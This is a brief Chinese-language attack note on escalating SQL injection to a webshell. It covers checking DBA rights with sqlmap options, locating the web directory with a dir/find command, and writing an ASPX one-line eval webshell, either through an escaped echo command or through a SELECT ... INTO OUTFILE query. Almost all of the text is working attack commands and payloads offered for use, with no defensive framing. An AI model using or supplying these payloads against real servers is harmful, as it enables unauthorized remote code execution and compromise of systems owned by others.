首先判断是DBA权限
–is-dba
如果是 --os-shell
写shell(前提是首先需要知道目录(web目录),得是DBA权限)
寻找web目录
dir C:\ /s /b | find “xLogin.aspx”
这里需要注意转义^
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx'
os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell
select '<%@ Page Language="Javascript"%> <%eval(Request.Item["pass"]);%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'